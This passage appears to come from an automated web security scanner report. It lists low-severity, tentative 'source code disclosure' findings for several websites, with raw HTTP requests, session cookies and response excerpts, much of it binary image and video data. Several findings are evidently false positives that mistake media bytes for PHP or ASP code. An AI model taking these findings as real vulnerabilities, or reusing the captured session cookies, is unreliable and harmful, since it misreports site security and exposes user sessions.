.v$....Gle9&..o......6.\..n..".N...V.ju..3.Y.q.8}5>.~].ep.<b.....;....|...#..I.y.....Bk..e...=....V..e..1*......_..C}|.7'-!
t...f....d.o...N....~N..........sI..r..|.~..>.Sd....OS'.;.N..7...H..]....Q...R..\....g.5..{.FL)..{.I.O*..Q..tsc.....2.I......^.["B(yR........2Jq..!...U..^.T.M.Y.+....D......k@e....t4.;.x..._....Y.f....V.3......R.......g.UW;....dPF...b...F..E..3.].'+B\...4..1. a
......Da...Np.Q..f.........m....i...>...p9.W8.......F`..1...p.8...u.....O.Z..S^.d.x.......o...F./.)C...........r...|b.Q.mW.2.......LoD.S..B.S". x....+F..@lM_.f'...*.p.I-g3..i51..N..V.....Dn:\..../....76:Pn..#.^.l..O,....13`]jJ.WX.....z...f.=...,...rS0/4...h...........X..(UD=...w..*.../.9....7/X..n..G!}k.GC"i...O.t.7g^..i.D..x.EM.!.Q..z..n../..^.P.6.}....F.....    Ea..I....L..r+
.}..$.:.1..MM.Q..F.....D.S....Z..b.....Z?.....E.u^..&L..$9..N./....!..J.].......o...L.#.;.;;......{.K.....A.......W.D.....JNS.{..J......WU;$:..G.Ya,..Z.".Le...8....pP}>...$.=.u..I.HVzlm.C.Y!.t.u.
.~.T.T....p^Y.,..\...ZMB9.t..2<.!..q.._..Aq...i....t...y.].......v...0.....&5B^....I.....Lx..D    .M.=.4dU...A..P...5...[

Y..........n..!....C.........J..v...@.j.....;.x..-...".5,G.c..J0.y.Fd;.....Y.P...m..;..n...6h..o.,._.}.fr./..l..As:"`..h]........h...U.'E..v.Y...Ir7.....m..P...-........,1_..R..b5'.5.d..s5........$R.93..?.l...H.VG.m.h.YK......_..Y..J.0....]Zi..=..Q..0.O.3....$.6i1.lH..W..Sm...........+1M.8U...F.fGM...9.F.I..?...bE..L.4...y.......,.....,j...........W.LQ....2a..'!..Kp/......./..r]...m.g.2..TM..|......4....    Y:cpX.....hZnc....*DZ".../>W.".^..9......G.)..)...Bz.rAX.40..)...    D.......]..^..Q.h.y...>fC+..Z....*.....6i..P]P.z.....H...:....},4.Y~.X.nJJ#.dk.C.Wn...w.*....')...:.^._.z.{]j....:~9!...(..g(v..N....IH ..`.l.pp.x4}4.j..].
._.T
Y. .^c....G1.hm..../...;..u....i.....z...../NX.\-......^Te2..7YbYQ...v..[o..+.L.)A.y...;.!....]...
fe...2l79HI!...eX.....a.Z{Y..l\...O.....1...........Y....uy.UT....s~<..y...B..%(....F....t{m...A..KozH}.V[..\...N...&..Hzs.J...Qv...Y +....."...    .p'.B8.?...$...~4.?bKUt../...U.7.E.M?....>......+Y....s3...vD...q.f.........e......k.......@.L+..e.....9.x..Fow.[3..SET~3dQ<m...!.    .l1GX#...m.&.).Ie.u>.....P..yX.l.\..I.}T.!....|0..{.|.1C......M.u..1....US)W....b........TFw6...V.<g..-...c.F......:I.A..%RsD.cf..Z........r...]k.'.......7.AS...;...O....T...e..E....#C.D?.i.V..M;=..1?C0.K.3......v.    .M...].G..7/.Pi..}...n.K.B)...u.....$...q..&pr...
..J.v..EF.kYN.;... ......E~.M..j.......N..Z..T;...-|c..su.~...J...j....@S..DWB&.....~V..
......    K_c.....F
...aL$.D.ap'^a2de..l.Rw....    ..^./x0.?...*....H.g..10.J...+.LI......P/..M......."..$^..?..GG..#....._..M..)..Cdq....7.s...@.K..HY.........$..w~r..2.....e...:..A?M_..";
.@.4.W........ZX.....@[.s.....m/JL.qd3.a}..m.........@...~@..S..:. .V.R.{#....f8{.h..4.2..tT....    ....I...61[..al.]..LU6b..:s..b7....n.d.n+...h9$"Tv..........0....Jl. .J.........
......Q...tw........%=K.g.%..e....+H..A,n....h..c...?.......3d..a.........z+."    [.uCD......."..r.f.....j..b....b=..K.. pv+.@.Zi.7o.......-B...A.n..oU..Wj.U.g...J1I.............q,p~.^.[a/.G.Os.b...p9..".
...
S....2.7X..dDeP..
..1.V.A...kq!3.["g.3<...EhM.Cj......A.    .[<..dsj...D..~.-.OL............&8....Ty....(",.Vhe.q(.....I...$.....t......b..+v.....jB..Ay.i..z{............S.Zs.Z>.J..............0..~.Gp*../....t.......U...M.....
K..K...h..:..:.........QA{*......p........o.a..2.K..    ..4v.R.L...`..e.[2p...".y_n..b$.r.>8G.u.~#j......w..G@.......<V.q<..Y...mC.=G.2..D.C.t..d...F..}@....GCc%n...Px.5..TU...?    ..O,.c.}._.,U.....S.y.I'..d~...8...N`..Q..A..HL...7,.q..:_.......pl...
I....|.x,..".I.........S.f$f.......u.9.aX..L.A.j.#.e...h__....}........'J|/..3R7.*..).".Q...U.e.}..|......P..a..$.......'..e...<mZ..I.Q..O....y.&.j5..s#rSj....(GaZ..bp..R.[._...Y....`5G...u..A..
...........C^.,t.~.>...h.3Z../..Y..Qn....l...a.Kv...    C....%B..].z5..... ..-._e.Y./...*
.h..hW...e.I...............SVd~......!4.5U.XHG...."F...'.c.%UGG.]^.NzO...e..kH...T.$.#...6YP{!..b2......-.~iz[HKSl!..p.#..._.".R\...6.........=z...Y......R.    @..C..`j_....*...D6'..y..nH...xr.../...P..R......D..}.)......yHNV.......E.5..i.w..}.......~.\*...|..lS.R
.R..b........97.6&...p./............k...y..3...^v.A..ev.......<K..d....... n0.Z..c..........Et@;.)..../#.~.k.....x~..U...=....fY.T`8G.....].:.6..3..;...*...].....`s.....;.........'..<..v.D$>}..s....?0.....Y.K..9.....].....].N...qk.. ..X.`,.
d..t...1..vH.7..]<..D.,    q;.\.&r...S7*.".w.j.z.%.3.......:.e.1*...3...v,.KAs.+`...<.H..q.u..0.m.N..<E...#.7.|.%s...qT.....b.K.w...Ku......W.[..A..B...Y..
...I..&.......M.P..#..q.]..*..#!M.D..B...i....Y(M.D.N_.......R.h7.T..:/j......LJ.3...<......fa_NN.'.9....|..Kp...UB...h..i......x...]C.R.5..Dg...9....x..G.f"M.....T......F.*...zE...<A......<.P.e.w..04.y....C.DY...i...9a}..c.M..B.u-O..n...v...EB...'CW$A...=.s..I.....E..VS.."3|...........rc.e[9zy.y]w..gR....,6G.U........}<_.k^...O..
..=..>K{)].....D......$..^...XD5..s2`..C...8.S.1#).fL.|6.....v...C..(.....4N8y(u..L..5..-.i~.<`..;......%....4M..U..;1RS).W.A.'Ia9S..([
0.Tk........H\quh.iP..?.P{. ......5....l|\e..........e.....e*...lT.-Nps..D-.."R.z..2..D..+...B....WE)....^....g.m$?+a.G....G..+;..b.i'.....Sg.@.M.....bh....Q.R........i.bz...-s..M*....2G6.m<ek X.V..I    Z..'>xJ..z........{.....N?.m..|.Zw{&A*f...v.@e..j..I.....+...    .. ........m......V;..Y..{.Wb...y'.....K.*...v#....mQ..?..x.<N>GOn.$...5..Q..6..v[PA.8-q|...Ok.5.>.....&.-.O3Y.k..8J...+.28.NJ..J..hv. .$~.2.DA@R?w..<........\...."Gs..%.....9z...Ma'b..\U3
.<...za!.F..o.%...H\*3.......+_1.M7b...GY.;p.V.3S...Xj.7.g.....M.BC>A)L..TX..\B    j....x.;I.`.......,...$Iu2+1..e&s}s@$-..E....h..........J.g".]l.....!...h.}a.v....Y-.}q.{{.U.y.A:m
..==.3...../|...(..J...7.R...Q.%.b.....|.....:T..8....W.a>6,%..>.A20M.ziUz....[.2gR.W.o.*|. Dp.9>...U.E..~......K..e.5..>".=..U..,R.v.+.I...gxx.n.X?.1.O.......{L$hi....i...!....p.Z4S...q..n...g.\.h.Y3....,.j.i........J>2@.......Di...-.bE'{Ox.....O.9(.Y..1.<."rL.!./..Z..Sfi.K..1..(.t.p...........d/..\..t..'....N.....s...!..T}.|...Ls.ANU..D..\v..j,...... .].c..Q|.../tk....*d..[.J..R.A:..w96c..7R.........{.a...G...{;.qg    ...:#P......:...`A.$.~..4.6C.....hg#....=a...e..q...#)..........sc:....G.G..%...|........,Y.W.o.S)+.}.....;..#..V..%:zM.)+..H    *NG.....m..{...c.Of.........tq..7....,.!}.d..a.MBM.Z..H..4..9..6j~......p......g..z.l..&.(I....3...ED...1...........|).Z.. A7..*.<M.1.3.K..9....9..H.A..g..hm......vo.=A.4.........6[...'/.V<...Cy....hFM.v.8,.......V..m......5t.0...6;(...=..N.R.....`f....e*L.!...^,....T...<S..H.......?.4M.q..A!P+.G.K]..&.w8q...k...h1T.*.O..#g..#.R...'5RE.......g...b..+..%.......<CG..A^...%.<....g...VS!.M..4\; ........}.Y1$...........7j.......jC.T./x...Y.J..F.g.7.\... Y..Q.*...U[...5.....    P[..Y.I.k...    .m...z.....M.....^..Q..,y..t.N.tg.+...    .~.............Y.P[x...."..*&bhg...6..a.y..V.........9..L.._..o..SJVj.6|.4e%i....+..e.S...~D.H...j..,hXT..Yi...Nz.f.G..-...Q....?..?....c..<...[.T~!..%....#....,...m..s......rb.3.A..i..vW.Gi=...@..........G....C.O9N.7CJ.C.^..U.H..........?oU.M.....X..eu.....R.....^M...c.:N?.0U. .0.e...ddS G.>=..<.......q.....KZ+..,......Y
P...`.9N5..hlwG.}..>..|.2s...U[.p.d..........>.%..O.m0.b.......+T...."'lk<..|x...X.|......{^.%.........du..............J.y}........(.W.PL.8.....2MJ....|.Z>.[.!.....2G=.....1..k....u..y{7.......62.K.pN../.....9.8...p.h.cVm....;^X..i...H...1.....M9..ik..U.t..~......@.z.9=..9#..U:..N.e...g.Ih..x.5BEAg..Z....    .4..X#....f..b.q{...n..,Sy.M-...Y6./..=..:.^..N.;iH..H...g.S.O.......n.2|.4w..^C.....}(..lt...9.7.tF.6h.....b.`dtk.i\.p..O..yC>.7..9....I.I..6..r.@...l.."...&..    o..I..........QU.-.W..~o..2.....,..P....`............Y.._.i>h.d..
...+$. ...6..Uu..Y._...dd9.._)w.z\K..5...EYJ9....!=.....Q...F........y....Qk.`ZX1..B...    ......BZ.U,Tp..`{..q'%....N...`.kB....`1.7..3qm..|.:/a....4S.c...U......E...l..%....a.O-.r..L,....MXndv.)O...Q..}.$;`.!.Ic..s...    f.;;.=e..=c.\!.%.r.....VG..T.H`N......d.i..9.....u..y}(cE*.D....f.F...1.........H.....Ys...h...*.,..02^.......G....Dt.    =.&.5.....p.4~}yo..{.,4....I...)Fk......|I.G.....6;H......(4)..H(kG4...v.z..#-.......oq.@|.....(...(1....L..f.v<......ov%0j.c...    .i.H.Z:Yi..|.#f.....}.-.5F .i...[
..O..IwQI.P..B......~g_...g.3.X..C>C......hg....td6.......U.Z.8.p.f......t.5~w.......A...w9..,]?....=oc.g.vY#.:...?..T.1...l..se..m........ ..).N]..L..J........AM$........P...#.E].2..5.........H.r....Ouz...FA.6NFj..P...H..l.v?.......7..]..i.c...f.2..p.....n.|.;.v..g
.q..Uay.MZV...W..mF#&.....H.=..ZH.X....f6.Q.Ky2~...Wg..iV......n.v...._..r......REP...x.q+..2f.......p4.x...i    ..*.=......M......7.......C.9.."5z1(.,..O....&..?
.
\4>....H..+...qr....7@...&..o.........c
.~.8.7.....7..*.....3.V....p6.xp!p6xiOi.@..34...A....2...........1...L.J.i.Ay.E.9....|At.{...8w&4A...E..9B...b1......=.$..Qv...r..9^u;.;I...1I..!.~.....F.]s....    ......m_EX....~;}......]...W...z&.....,..:pw$T.C.....^.]...'m./3@3.j...b*.M.[.NV.....{.e.Jj'.}~....."q^#.9..._.5..BE.4........$;n..Z.$..(H...L.....n?fS,.0/d.(.COO.#"..|qt.w..GI
..a.U.Y..!3....T...?.Y.....T....W.....oh...-<.p.;"...8Wid........O..w.<D.<.\k..Tc4.@....BY..?.Q1..../...p...J..w...5&........L....D...i+.s.....P7C.....$R.........\.[.%h....J.cC~mJ.bN....g.h...:A.7^g .BHF.O..P}..iC............#.....d...*y.......6.'.E......4%I(F.B>...i.{$,C.@%St+..,.w,1.T........Kd...x.5...Vy.(..../..l.~.....#..    \.<I.{..@.....`.].t.Z.ky..2.N...>.Q:....~7.H....y,.`s..x..4u}....aTPB...#.......o.&.!.S.,.!,i.,.2....7.....    r....Rb.Xn.O4.J    ..PE.q61+u...sNrR.^G...&k........-FV..:..`~J-......b..>..D............NQ..q..q...|....l.S.%.x/._..*.gj...0x..b.......O=G..J..:.....4..tQ............a@!.t...T1.C.6. a$.|...,.........w+...9...ko.....C...b.......+...:B\......k..
..}....5\.c..,u;`%L..}<.......%...#..2j...7....V)........0.`..E..`..z.~I.............
.."...8.pvl.....j.6L...n...H.f.....l.A~{;.......V.._y..._.......PV.z..w......Y...@TQ......}l.gs........~.
..K..$.?.^DKj....X0.|.{..o.$.wG.%!.}
0..0.,.V8......MBq..|.....G:D..v...b.i[.$>........v...}...i.....@..B...B.    :...{o.S..)!.......$..l/.T.....X..=.e7Z.......h....~w.#../(..f.0!|....OM.dG...U....k.L.(.;R.tg....c.q...#[..'s.RM....w.....K&*.tu".[.7.........>.?.~.O.....u..D1.q..\.O6#A1}.....eM...S.s.......6|...J..}.SNT...Y.8....J._#..".r.7.@b%.3M.F.V.Kzp;...|..V......GK7.;@.@..0iJ..._.z...h!..C...^    ..^9.v.E8IX..`.4.......6FL.......l.H..[......q...1`/g.+*<5.2...7..}.....OJ....B............<tnFFG^r...V.+.@/w.>e4.....=[.v#..f.n......    ....[...
..)eGr....fR!KG.]PM2....!...........M[.TQ<...')!...?.....    .-.+^.4.....+.....R7.I...iJ!..t.qN.J*.`...;.Z.P..Re..5'w...J.......?{Yi5..k.|..8f..a.#.d=....9|..o..*}....6.    .qK..._A.    ..x.s.d.6....t0...T.kD."...(N\...nlP.vF.)..k<.............P.@.....&Nq.....d.......4.B....9......-M.}/R>.k.>.}c.<."...7&s. .A.................S..Y.h.../S.RY.....?}....,..x....}<2..$_...(..iOhs..F.i.~...ah.....].EG..>...{L.:)..5.......\..V.e...-...;.}.!..K.....(*...:>..]..Pn.\...oZE.'c...q3...o...Cd...whP..#.... /- .....%.P+.5.H..p..x.z..d.t    d.tFkE..MN....B.|...8.1U.}....Ck...4.U}A.y}.`q.....#...i{..3Wp...G.|.+;...L.+.........\z...~3..r..DL..e..M...M......~.F.x..<.. rl...$    .
`.X.3.G.....5.8.*...h.+....XV..|5`
........} 3..c.........`C.y..(.R..Mv.`._.>....HX..v._.._.s.:....<..
X.....fO.....d#.>.u..t...A..!.~....OkO.6.    ....xO..!C..i&...L.g!..]Ym.....o.y...%....\...n..zW.|.......yk...y|.........i<.L...q.t.....}......|........+......t.W..{.J...2gE...O...O.Q+HW\....xOVs.....
\g...GJ.uYYy.......gd.q1....RCsB.......^.w)>u.7..V.R..3......QQ.......1e..E    .t.7.Z?*...j.6.3.).g"...D...T....y.52R....+KF.\K....QKt...'....K.W.....5:...}5..2.._.......<.Z.....#A+..$.d.T...n.......{....dN.t!..!o/@.|xj.....u".PE...H.S;.2`.    .k6.......@ha..a.?l..........8R..w...v.. ...#R_[..2].M...".c...h.kV..\..C..\..u.s.....<....x...9...F....X...J..[.c.............Y..:-..MQ..K.gGd.C=.....v1.z.....R}u..vq.N.v....>l...TU...z...b...    .P\".c...w....f>.P.b. :.'..A.Q.3....].....
.H......*...:c.8}S0    ..........4..-$v&..3...G..L3.]`.v..{..5,....}!.9......5b...f`.U%...w+..o..    Y..e...>.u->.......K...    .?...D.n..t...d.A.V.n...<x..A.{(......\.....j..QX....|.;W.I...9..*. ....lW.,q....5X....0....jY....)...6.2...a.L.0.>..4W.o".......=$k..e....I.O.3J...f...........ea.x.    .c...>-V.BG.%.!..q.y.....#.d.Q.*s.t..7..]....=x..u....y.]...au.+.x...k[.E.e.4@wY.K.ss...d.P
zV.|>.....k.,...'K!..W..D....qB]Q.....8+F...D2.,|.-F..;...
....L.J.{a.....3m..@5.{Rm....9.2.K....+.d.w.\.Q.>;....8+.v.M0...#.n.iWF..]eA.....(.CjT......x.GP+.u.nY._..Q$7g&.......uPH.....c..:....I...Tw.O..f...:..EV)..8..+V .........a..z.i.
..o^....%.A..N!...#....t.    N.o.#.....7... ..j...F....&..Br.p....)..A.......+.....K9............m'm..e.^.,R.7.y..-.j0e....Ux..c7....=.;n.l..x.f...J..9.BO._D..#8...%.......)."F.!G......je......S:1.......b..P    .&.F...<.4Zj    j..0.......OdK.<."Zz#....V.LQ..|
..^...K7...........
}...)...j..^@Y|...Wb...V...Lo........+.Z..Q.q.T...IQ..v....s>.\...L.r.j.!..qe$    .DC..Pg.r.|.aNr...UY!....h.....&.6...E./......9.MO#}....A...(...'2c...zN...=.c.0. 024...........^..2.....)...R6Y...&..:.5|..v.....t...&.....7S.F.....h...v.\F...]$..Kb3..4nD...f.%.A....1b-..m.A.....&...}...k.Yp....f28..?..]6.y...$...9.. .nN.rcA.E`.0GNb.....;E..V.....%4*....m....e.;70.A..r.}.\.`...d....sqM?......H....~...pa..:..h....4.N.q|.c...Y!.kHs..H.Y.s.IeSZL............Yf9..G..*.=...X.|.d.Z..6.~,&._V...n.MV..m.9.y;...\Z.b.z.U.2....Z...l....K.X*..5..m......._i..7.V.PID.s.=...t-.H...+....T&......X......y2 .{......c...U..*..N....>6*(O^.p#.....A.({....7..L.....o...U.J...E.ZL.....s5.....[*sR...m<V...f<.C'...    .YFPi.Tqd-...<{..xAn..F.....>.0i..l.0.M...    ..An"u...V5.zmqDRnG~e6.CP.....1.`.4}.u...Q..<..d.C.n^.LZ...`./.62...pFS.pk.<...m.,oa.....}.rL...$L....K.o...<..z.xG....]    .....M.]).>....?8.......j..T    .>..
gJ.&.Z..,.......S.._.bPRs.}...
X..~0../Q....L.m...Nu.....&\...^.......g?81.Y..<.....5_...+O..C........UX.TYw8?.....J....t.$^.._.]4:....-..z.]......1...t..\.Q.D.....<}{..US..3..#.A..ET........^'......9...**W7..m..y...F..q{...-B(..|;..]..v(..|E.fV.o.N..    .Rf#    .......eX..?.b.... .}.S_........$...\...s.o..CW..x.&...M.Etv...U.[...yf.:...".n$.p....1.#.Jr.6.'...^.!.b.+...v.16...7.4hk.Q....j."..R.......i.;...qZ......qD.....L...A...a/.R+.[.F*..].A....J1.;.....MVwN.4@M.`g.Bm.....1...ec.......g...!q`IL*..0....4W.`y_.|I:.....<.cB\..!..
....x.7v......V...P.B.Tw......v.eh..wm..ge5....<j.*C.,.-.]I.}..'....'s@J.............{g.OlTrA.......W...Mo.....b9..k..+..{..w.:Gn..Sm.Hv).R........X.4W..(:x...Py..`...C.i.j..z. ..'z.......+....W....6..}.........wB.&.hk.X...'<.;P^AW.s..    L]F#.e.Z....S.E..C........d..5Xe];...].IAj5..4,Z.....IHh....S.".&.-k^...`as,~qC........A,~.B.[....x......u|T.{......t....4!. .:..
}0..Qd..2.*..>Aq    ......H}.+_.....|.wk.,./..........V;.".._]...fW#...h...t.....o_...D....n......[w....eG(k .9.0u.*.T.+...Ds.....#..V.+-.;.......Bs..B.C.^...s..    \V...!0.c.@K..lQT..bE...y
b.....+...L....WS@...T..3.'......w...`.07.u;..7    ...+..P.h.?..F.    pKP..h4jG}.v....a.....~.O[..3...5..t...-...|l..m..~.....B....}.m'........R...A)..._...|o....}(__N.........G.a............M7}cp......FN.h.....H....2~
..L.....13X<..RT..T.......:.*.vu.'.l...J@.J......u.......... e.r...L.2.h................B.`V.8dq(dL......)d..v.)dn...Q??a.4z..j....S.S..    ..v....o..x.H$(.\8.......a.?..........M...U[.A^...F..-P.[$....t..F...._...T.\EHf~.;........_......
`..8W.............a..c..A~y..y.....f...@.b......?.m..^b....U..Vg4..
H.N...K.e.......:..*`;w.q. ...?cs.J.....yO..A~......yIS.M..{....t.I7E*..)d.....F..uy...K9..#.1.6.90....."...Ku<"..F.M.u.+m(.6.o....3"...aM.r..4..!.........s.r$......TY...$4...ad.U.Q.-D..i..[^..V..{(H..w..J.A....k.C....^m.nn.`_:..k..@.P..>....s....o..y..p.....}.....P.?`.S..8.U.;.....RL....w..bK.W.)o:...    .}..x    .r..}-.&/..6.!;.7%......4........;.\...Q_...#....../D.z.&..*.T- ./Mm%.P....j...8...i..:.....r..R.4H...zf>.t.e#..L......]f._.h....:B...K4{4hw.....q.K.k..f.o....%c..I.s.UU....g....un..v.....b...Ny.G....H:.b".+.2...?...X....mL....{.....mc3.U.y$O6E{........B.-1....@P..Pa...}%La....<...\.9l.0.04............2.L.w.C6.....~...s...).Q.o...q=>.    ....    .:r.PK.t..iK.\uju.gt1t...q.1Ly.ko..-..O%..M.E....us'h...;..+/..d;..K.Ax...w6B.'.....!......C.8`...*..x...}.AK5.[.)..g.0..Z..^.
.>....~....
CJ...    Z|.~..%#..!..M.....".|......H\..........qOL.R.?..|...:.E..V.{...... .>E.pL..a..j.&(p...w..15.4.a.N.^B......`.i....Ahe.p/=!j.D..<..._..q..J.|$..;.8.w..%.....-....1W.=.X'y"..e#.....%>. =C.?.    j2...8....]....    .j...6..&.h)...O
..92s..H.T..
.o.W..0.~<+.CP.. T.....8..f..9C......H..]..b-...%Q.]..?.3.&..(.P...3...?.G....K.5w^%{.....    AY....7Y............C.......D..-.H........hN.h.Y4...w..
...[SNIP]...

14.4. https://gc.synxis.com/xbe/scripts/xbe.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://gc.synxis.com
Path:	/xbe/scripts/xbe.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /xbe/scripts/xbe.js HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: https://gc.synxis.com/xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574083|session#1296573995979-796819#1296575883

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:29:51 GMT
Accept-Ranges: bytes
ETag: "b8c810f360becb1:17e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:26:19 GMT
Connection: keep-alive
Content-Length: 26783

Type.registerNamespace("Xbe");Xbe.State={shell:"",template:"",viewId:0,hotelGroupId:0,hotelId:0,langId:0,rateCode:"",roomCode:"",packages:"",arrive:0,depart:0,roomCharges:0,taxAmount:0,feeAmount:0,tot
...[SNIP]...
ry("#"+a).click()}function TogglePanel(a){var b=document.getElementById(a);b.style.visibility=(b.style.visibility=="hidden"||b.style.visibility==""?"visible":"hidden");return false}var calendar=$find("<%= Cal.ClientID %>");var DayClickedEvent=false;var IsOddClick=true;var cal;var start;var end;function CalReset(){CalendarSetDates(calResetArrival,calResetDepart);if(typeof CriteriaSetDates!="undefined"){CriteriaSetDates
...[SNIP]...

14.5. https://login.hitbox.com/images/001982.banner_viralvideo_v1.hbx923x320.jpg previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://login.hitbox.com
Path:	/images/001982.banner_viralvideo_v1.hbx923x320.jpg

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /images/001982.banner_viralvideo_v1.hbx923x320.jpg HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610; testCookie=set

Response

HTTP/1.0 200 OK
Content-Length: 54974
Expires: Sat, 05 Feb 2011 11:00:34 GMT
Date: Wed, 02 Feb 2011 11:00:34 GMT
Content-Type: image/jpeg
Connection: Keep-Alive

......Exif..II*.................Ducky.......K.....ihttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...........
..14..h....X..............................................

.............................................................................................@....................
...[SNIP]...

14.6. http://meyerweb.com/eric/tools/css/reset/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://meyerweb.com
Path:	/eric/tools/css/reset/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /eric/tools/css/reset/ HTTP/1.1
Host: meyerweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:29:22 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 8955

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>CSS Tools: Reset CSS</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</div><?php if (function_exists('_mw_lt_update')) _mw_lt_update(); ?>

<div id="redesigns" class="panel">
...[SNIP]...

14.7. http://trw.com/00_assets/02_videos/Orb_Loop.flv previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://trw.com
Path:	/00_assets/02_videos/Orb_Loop.flv

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /00_assets/02_videos/Orb_Loop.flv HTTP/1.1
Host: trw.com
Proxy-Connection: keep-alive
Referer: http://trw.com/trw_flash_preloader.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS6ce6c8782f0180a7bbf1be6e3bdd5794=irfb6j6tguh6qri8bi1dehb9l5; has_js=1; __utmz=252366028.1296674192.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252366028.856381729.1296674192.1296674192.1296674192.1; __utmc=252366028; __utmb=252366028.1.10.1296674192

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:15:44 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.6
Last-Modified: Wed, 07 Apr 2010 22:46:22 GMT
ETag: "10000000056bf-87de0-483ad54cacb80"
Accept-Ranges: bytes
Content-Length: 556512
Content-Type: text/plain
X-Pad: avoid browser bug

FLV.....    .................
onMetaData....
..duration.@$...Q....width.@.0.......height.@wp......videodatarate.@........    framerate.@=.Q......videocodecid.@........    cuePoints.......0.......name...endLoo
...[SNIP]...
<D...{...5.3?...[...l2.T.....|.B+.a'..)z\.^X..d...`M}....iX.f/'...4.Ar..8..1x.<%....n....t.s.....3 ...yK...A.9dq.b)..q...6.g5'/..c......<@'..x..<.....=N.....{.BdCA\F.u....R..y..........t.!a.....;.g.}..y.\.........g'..=.....s$P.<(.P..Z*....l..ye.....U....35..7..]........f....,.6.1(~..9.F.0..    RQ...T...F..Q..#~.*(Qcn#..e..B.:..I,Q....R.7.5....|.....4..b...09..I.........T..bc...x..o1.(...y.HR8s.]..{.._.x{..;pV..~D&^....\.Pw.p...7.~...^*...c......Z.......f....rj...F.b>...@....>......h.V.g..qd...E%.......m.....:...Xu.aJU@....(......Iu...=....xl.ic4.k<.....,C....wK.W"lS............>..'.{.]..i.is.R.....Vp>Z.......x...M..........8.o[.b...8c....B..5.6.....D......w.2.'......u.c..5..3q..7.#.7..TD..<U..!..^7.73...Ku...j.[.9..e.Rl!..`....5E...D?..t.u!~.1."6L9....).L(G.....PrREz..*<.AQ. .B....I=^=0a.....S.e....}.%3..6.1..Y]k.Y..7.....6.qX.I.MZ.m......T.0..}....5...^J...O.<s$.`$.....N.S.!..h..l..)d..m.*.P.i.....=..."..c.O>...JU...... .....od\.0,......z...>..kR.....%.%:....&6....\~q.h.....+...C.......v.......n...5^..O..V8|...U..F-3..f.........d..S.2..&..V_R~I..~:5>+y.
...w..k...,R5a..$....o;......W.B...<G....:qxJ{..>Q.a..}..k..qM#2j!`...s:.....lM......D.....m....q7q....J...L..P}I.)..5...TE..,..o.0T.K.q.d.    .((.+.C\......5......-......h..y...j....4...juY..WL.E........    .g-.../YeJ..&.wR....Lw....z9.Z......N......3&.zbkq.l....s..1.g.G...%ut...g.g.e7$..Y(........._.g...__u.k.J(.wb..RK...[....{O......|<......Er........`T..z!F....q..;o7.y&O.QB.c.$....!Do.f...s.Lk    ...C.Eqc.,....]..i|i..'W~d.5#..O...".U.k.Y.._...8c.*....+...#...<...V...t.f1....1....N.3:"..Mi.......:.U.E*&K..H0.4$..Uw.?...MQ...&...vm.[......{.1....)Id...:...w.....?.g.....}ak....w.6...-...&%1.Kt..\.....eL^.P...f....fZ...b.v...jl...f.xE..:....0c~#.....Ng.f.1O.o..eH.J...>.}..e/.J..Ox..1O.c."f..M..../J.......Ci..p.'...#E`.a^..$.....G.#^...."..........K..(.i.4c.a4W.....^#H.6.....oo......jD...?............M..R...s.M.d|.G.GN5..+.....5O..Kc.\.......Nen
.S...4.].L.>..B..O.cy.n..[.....J...j...jw...7&..<..Go.L.^...+2..P.h....I.M.m.D..8.i...v.3.(.C.C......Q.....3c.Wh.^M.Gx_4
